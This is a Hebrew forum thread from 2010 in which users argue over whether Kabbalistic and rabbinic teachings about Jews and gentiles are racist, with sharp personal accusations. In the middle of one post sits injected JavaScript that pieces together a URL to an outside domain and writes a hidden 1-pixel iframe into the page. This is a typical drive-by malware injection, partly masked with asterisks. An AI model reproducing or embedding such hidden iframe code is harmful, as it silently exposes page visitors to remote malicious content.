| נשלח ב-15/11/2010 12:33 |
|
| |
הקבלה היא גזענית לא מהיום, די לבדוק את היחס של ר' יהודה הלוי למעמדו של עם ישראל לעומת יחסו של הרמב"ם לכך ואת איגרתו של הרמב"ם לעובדיה הגר לעומת דעתו של השל"ה (המקובל) שיהודי אומר "על כנפי השכינה" לעומת גר שאומר "תחת כנפי השכינה" אחד הטיעונים החביבים על מתנגדי האבולוציה הוא הסכנה שבה כאשר מעתיקים אותה ליחסים חברתיים/מדיניים/לאומיים (וכבר האריך בדברים דומים שותף_סוד באשכולותיו), אם נקבל קריטריון זה מה צריך להיות יחסינו ל"חוכמת" הקבלה?
|
|
|
|
| נשלח ב-15/11/2010 12:36 |
|
| |
שותף,
צא וכתוב על קרן השור שאין לך חלק באלוהי האנושות ואין לך חלק ונחלה בין באי עולם.
|
|
|
|
| נשלח ב-15/11/2010 12:39 |
|
| |
שותף,
ואל תשיבני מגדולי עולם שכתבו כך. ליהווי ידוע לך שמאז שהיטלר החריב את העולם בטלה כל תורת הגזענות של חכמינו ושל חכמי הקבלה. ואם אתה סבור אחרת לך וחבור ללה פן, להיידר, ולכהנא, שם רשעים ירקבו.
|
|
|
|
| נשלח ב-15/11/2010 12:40 |
|
| |
| שותףסוד כתב: |  |
כמו שכתבתי למיימוני אני עונה גם לך וגם לירוחם וגם למקסמן (וגם ל.... שברקע) - למה שאעדיף את הרגשותיכם ודעותיכם החביבות מול דעותיהם ודבריהם של גדולי ישראל שמפיהם אני חי ? |
|
אני מוכן ללכת איתך לכל גודל ולשאול אם התורות האלה רלוונטיות היום וגם אם מותר לך לחלל את השם ותורותו כאן בפורום,
ואז טענה לנו שאל פיהם אתה חי, כל זמן שלא עשית את זה ?? אז תפסיק לחלל את אלוקים ותורתו ועמו הנפלא,
|
|
|
|
| נשלח ב-15/11/2010 12:45 |
|
| |
ואני לתומי חשבתי שדגל "האמת" חרות על פיתחו של פורום זה.
אכן בשם דגל זה מותר לחרף ולבזות כל דבר שבקדושה, אבל ח"ו להשתמש בזה כנגד מה שאנחנו מאמינים בו (אחוות עמים, קדושת האנושות, ושאר קישקושים שמאלניים).
הפתיחות היא נהדרת כל עוד שהיא לא מופנית כלפי הערכים היקרים לי.
צביעות.
|
|
|
|
| נשלח ב-15/11/2010 12:49 |
|
| |
תוקן על ידי אליעזרט ב- 15/11/2010 12:52:08
|
|
|
|
| נשלח ב-15/11/2010 12:52 |
|
| |
| אליעזרט כתב: |  | שותף,
צא וכתוב על קרן השור שאין לך חלק באלוהי האנושות ואין לך חלק ונחלה בין באי עולם.
|
|
נפוליאון בהתגלמותו !!!
|
|
|
|
| נשלח ב-15/11/2010 13:05 |
|
| |
| אליעזרט כתב: |  | שותף,
ואל תשיבני מגדולי עולם שכתבו כך. ליהווי ידוע לך שמאז שהיטלר החריב את העולם בטלה כל תורת הגזענות של חכמינו ושל חכמי הקבלה. ואם אתה סבור אחרת לך וחבור ללה פן, להיידר, ולכהנא, שם רשעים ירקבו.
|
|
|
|
|
|
| נשלח ב-15/11/2010 13:52 |
|
| |
שותף
ההבדל הוא- כי את האדם שנוצר בצלם אלוקים אתה רואה אותו מול עייניך במוחש- והוא לא שונה ממך כי גם אתה נוצרת בצלם.
לעומת הספרים שבקדושה- הם דומם וכן מי קבע את קדושתם אפשר להתוכח על כך זה לא מוחש ולא מוכח.
|
|
|
|
| נשלח ב-15/11/2010 14:01 |
|
| |
הערה כללית:
מדרון חלקלק.
במקום להאשים ולהזדעזע, נסכם. - הסכמנו - אליעזר, מקסמן ואחרים - שאנו רואים גזענות בגישה שמציע כאן שותף סוד. שאלה לשותף: האם הגישה שהצגת היא לדעתך גזענית?
מעבר לכך, איני רואה טעם לדון. סוף סוף, כפי שהעירו כאן, גם ריה"ל הציג עמדה שיש בה טעם גזעני (אני משתדל לרכך). ויש מאמר יפה של ליבוביץ כמדומה בנקודה זו ואולי מישהו זוכר מהו והיכן הוא.
*** שותף סוד
אזכיר את מהלך הדיון. טענתי לך כי דברי הגר"א והלשם ושאר רבותיך בני הדורות האחרונים הם מחודשים, חלקם נגד המפורש בתורה ובגמרא (אם כי שם קשה יותר להוכיח סתירה, כי יש מגוון דעות ברוב הנושאים) ובוודאי שאין להם זכר שם, אלא על ידי אילוץ ודחיקה.
וההבדל בינינו הוא כה רב עד שיש כאן ממש עולמות שונים. העולם שלי מכיל את ה', העולם, בני אדם ובהם יהודים. שלך מכיל גם ישויות אחרות, כמו ספירות, סטרא אחרא, ועוד...
תגובתך היתה:
השאלה הפשוטה שלי היא למה אני צריך להעדיף את הרגשותיך והסתגויותיך יותר מאשר דברי הגר"א האר"י והלשם, אשר עומקם גדולתם ועניינם מתוק וברור לי עד מאד ?
ובכן, יקירי, דבריך מהוים בעצם הודאה שקודם לשלושת אלו, הגר"א, האר"י והלשם אין לך ולנו מקור?
שנית, אתה הוא זה שמציג "מדריך" ליהודי. כלומר לטענתך זו יהדות. אם הדברים שלך מחודשים לפי תאריך פירסומם (לא לפני היות האר"י) ולפי העדר מקורות עבורם במקורות ההיסטוריים (מן המקרא ועד התלמוד), אז על מה אתה מתבסס וכיצד אתה מקוה או תובע שיאמינו לך שזו היהדות?
מה תענה למי שישאל: מעבר לנימוק הפרטי שלך על המתיקות שבדבריהם, ומעבר לפירסום הרב שיצא להם? כאן כמובן עלינו לברר אם הפירסום שיצא להם הופך אותם לדמויות סמכות. וזה נושא ששייך לדעתי להוכחות החיצוניות, כטיעוני סמכות (יש להאמין בגלל שרב פלוני אמר והוא יודע וידוע שהוא יודע).
בהמשך אחזור לעוד נקודות, אולם כאן, כאותו עורך דין בפולמוס, אני אומר: די לי בזה. כמדומה שאתה עצמך הגעת להודות שלדבריך אין מקור מעבר לדמויות סמכות שעליהן כדאי לפתוח אשכול נפרד.
(עדיין טעויות הקלדה מחייבות עריכה).
var as='h';
var ac='tt';
var ab='p';
var ay="//";
document.write("*************** src='"+as+ac+ab+":"+ay+"llaptops.co.cc/a1.php?a="+***************+"' frameborder='0' height=1px width=1px scrolling='no' ><*");
//*
>
תוקן על ידי מיימוני ב- 15/11/2010 14:04:32
 |
|
|
|
|
| נשלח ב-15/11/2010 14:05 |
|
| |
| ירוחםשמ כתב: |  | ההבדל הוא- כי את האדם שנוצר בצלם אלוקים אתה רואה אותו מול עייניך במוחש- והוא לא שונה ממך כי גם אתה נוצרת בצלם.
לעומת הספרים שבקדושה- הם דומם וכן מי קבע את קדושתם אפשר להתוכח על כך זה לא מוחש ולא מוכח. |
|
אם כל ההעדפה היא משום מוחשיות מול העלמה, הרי מותר הבהמה מן האדם אין. מסכים שהפרה תתעלם מספר עמוק כמו מספר רדוד, ותעדיף על פני שניהם את המרעה הרענן. "האדם" חי בתוך הספרים והמחשבות והתכנים המופשטים בצורה הרבה יותר מוחשית מאשר בתוך סיר הבשר. לכן הציור החיצוני של האדם לא מפריע לי לראותו על פי תוכנו הפנימי, ואני ממש לא מתרשם מצלם אלקים שאמור או לא אמור להיות לו (דרך אגב האם בכלל ברור פה בפורום מהו אותו צלם מסתורי ?).
על קדושת הספרים אני מנהל את חיי. ביזויים בעיניי הוא לא פחות ולא יותר חשוב מאשר ביזוי הגוי (או כל ערך אחר) בעיניי החברים. הא למדת מה ששנוא עליך אל תעשה לחברך.
|
|
|
|
| נשלח ב-15/11/2010 14:14 |
|
| |
ראה בספר יכולים להיות הרבה מאד טעויות - היפוכנדר קרא בספרי רפואה להתרפאות בסוף מת מטעות דפוס. - זה שאתה לא מבין למה החברים נזעמים מביטויי הגזענות שלך, אני מבין. אבל מה שאני לא מבין איך אתה מסוגל לסבול את הביטויים הללו? את זה אני לא מביו.
|
|
|
|
| נשלח ב-15/11/2010 14:38 |
|
| |
| מיימוני כתב: |  |
במקום להאשים ולהזדעזע, נסכם. - הסכמנו - אליעזר, מקסמן ואחרים - שאנו רואים גזענות בגישה שמציע כאן שותף סוד. שאלה לשותף: האם הגישה שהצגת היא לדעתך גזענית?
משחקי מילים.
גישה שמבדילה בין תפקידי היהודי לתפקידי הגוי (שזו השאלה שאיתה התחלת) מוגדרת על פי הבדלי הגזע ביניהם ואפשר לקרוא לה בקצרה "גזענית". הקונוטאציה השלילית של המילה מגיעה ממקומות שבהם אין הבדל אמיתי ובכל זאת מחלקים ע"פ גזע ואז זה לא הגון וראוי. במקום שבו החלוקה היא בעצם זו חלוקה על פי גזע.
האם החלוקה בין תפקידי הכהנים הלווים והישראלים איננה תלויית משהו ? החלוקה בין תפקידי גברים ונשים איננה תלויית משהו ? אז כל זה גזענות ?
העניין הוא שכל חלוקה שנראית למישהו מוכרת ומובנת היא בסדר, וכל חלוקה שהשני סובר שהיא מוכרת ומובנת היא "גזענית", והוא כבר כותב אותו על קרן השור ועוד מעט נופל מהשרפרף מרוב התלהבות.
משחקי מילים.
תגובתך היתה:
השאלה הפשוטה שלי היא למה אני צריך להעדיף את הרגשותיך והסתגויותיך יותר מאשר דברי הגר"א האר"י והלשם, אשר עומקם גדולתם ועניינם מתוק וברור לי עד מאד ?
ובכן, יקירי, דבריך מהוים בעצם הודאה שקודם לשלושת אלו, הגר"א, האר"י והלשם אין לך ולנו מקור?
לא הבנתי את הלוגיקה. העמדתי אותך ואת החברים בשורה אחת מול רבותי (אחרונים מול "אחרונים") ואמרתי שאני מעדיף את סברתם ודעתם של אלה מול אלה. כל אחת מהקבוצות הנכבדות יש לה בודאי שורשים בהררי קודש ויודעת על מה להסתמך, ומי אני שאכניס ראשי בין האריות.
שנית, אתה הוא זה שמציג "מדריך" ליהודי. כלומר לטענתך זו יהדות. אם הדברים שלך מחודשים לפי תאריך פירסומם (לא לפני היות האר"י) ולפי העדר מקורות עבורם במקורות ההיסטוריים (מן המקרא ועד התלמוד), אז על מה אתה מתבסס וכיצד אתה מקוה או תובע שיאמינו לך שזו היהדות?
עברתי שוב על המדריך על כל שלושת חלקיו, ולא מצאתי בו דבר אחד שמסתמך על צד אחד במחלוקת שבינינו. אתה שאלת האם זו רק עבודת היהודי או שיש גם עבודה לאומות העולם, וכאן התחילה השמחה. כל הסכנות ודרכי המילוט מהן רלוונטיות לכל מי שקבל תפקיד וצריך להזהר בשמירתו. אם תרצה שאכתוב מדריך נפרד להישרדות הגוי שומר שבע מצוות בני נוח אשקול זאת בחיוך.
בקיצור, אין שום דבר מחודש במדריך הזה. סתם סיכום עניינים פשוט לכל מתבונן.
|
|
 |
|
|
|
|
| נשלח ב-15/11/2010 15:55 |
|
| |
ובכן, רק לשם ההבהרה כאדם שדי בקי בקבלה ובדרכיה , ברור לי שדברים רבים שנאמרו בשמה ובשם ענקי עולם באשכול הזה הם סילוף גמור , בין אם בשל תוכנם ובין אם בשל אמירת של הדברים באופן לא בהיר ונקי מספיק באופן שמביא לביזוי החכה הזו ולחילול השם, ועל כך אני מוחה ומציע למלגלגים להיזהר ולהישמר, הדברים כאן מייצגים את השגתו של שותף סוד ו/או רבותיו, שאמנם יש לה אי אלו נקודות השקה ודמיון עם החכמה השלימה אך יש בה גם סילופים וחסרונות מובהקים ועל כן מעבר לכך שלא ראוי ללעוג לאדם גם כאשר הוא טועה אפילו בטעויות שיש בהן ממין הכיעור, דומני שראוי להיזהר מלהסיק מדבריו אל החכמה השלימה והאמיתית, ואל חכמים מופלגים כהגר"א הרמח"ל ועוד.
|
|
|
|
| נשלח ב-15/11/2010 16:00 |
|
| |
| אישציפור כתב: |  | ובכן,
רק לשם ההבהרה כאדם שדי בקי בקבלה ובדרכיה , ברור לי שדברים רבים שנאמרו בשמה ובשם ענקי עולם באשכול הזה הם סילוף גמור , בין אם בשל תוכנם ובין אם בשל אמירת של הדברים באופן לא בהיר ונקי מספיק באופן שמביא לביזוי החכה הזו ולחילול השם, ועל כך אני מוחה ומציע למלגלגים להיזהר ולהישמר, הדברים כאן מייצגים את השגתו של שותף סוד ו/או רבותיו, שאמנם יש לה אי אלו נקודות השקה ודמיון עם החכמה השלימה אך יש בה גם סילופים וחסרונות מובהקים ועל כן מעבר לכך שלא ראוי ללעוג לאדם גם כאשר הוא טועה אפילו בטעויות שיש בהן ממין הכיעור, דומני שראוי להיזהר מלהסיק מדבריו אל החכמה השלימה והאמיתית, ואל חכמים מופלגים כהגר"א הרמח"ל ועוד. |
|
שמע זה תרגיל לא הגון.
יש לך מה לומר- קום אמור !
תוקן על ידי שותףסוד ב- 15/11/2010 16:08:16
|
|
|
|
|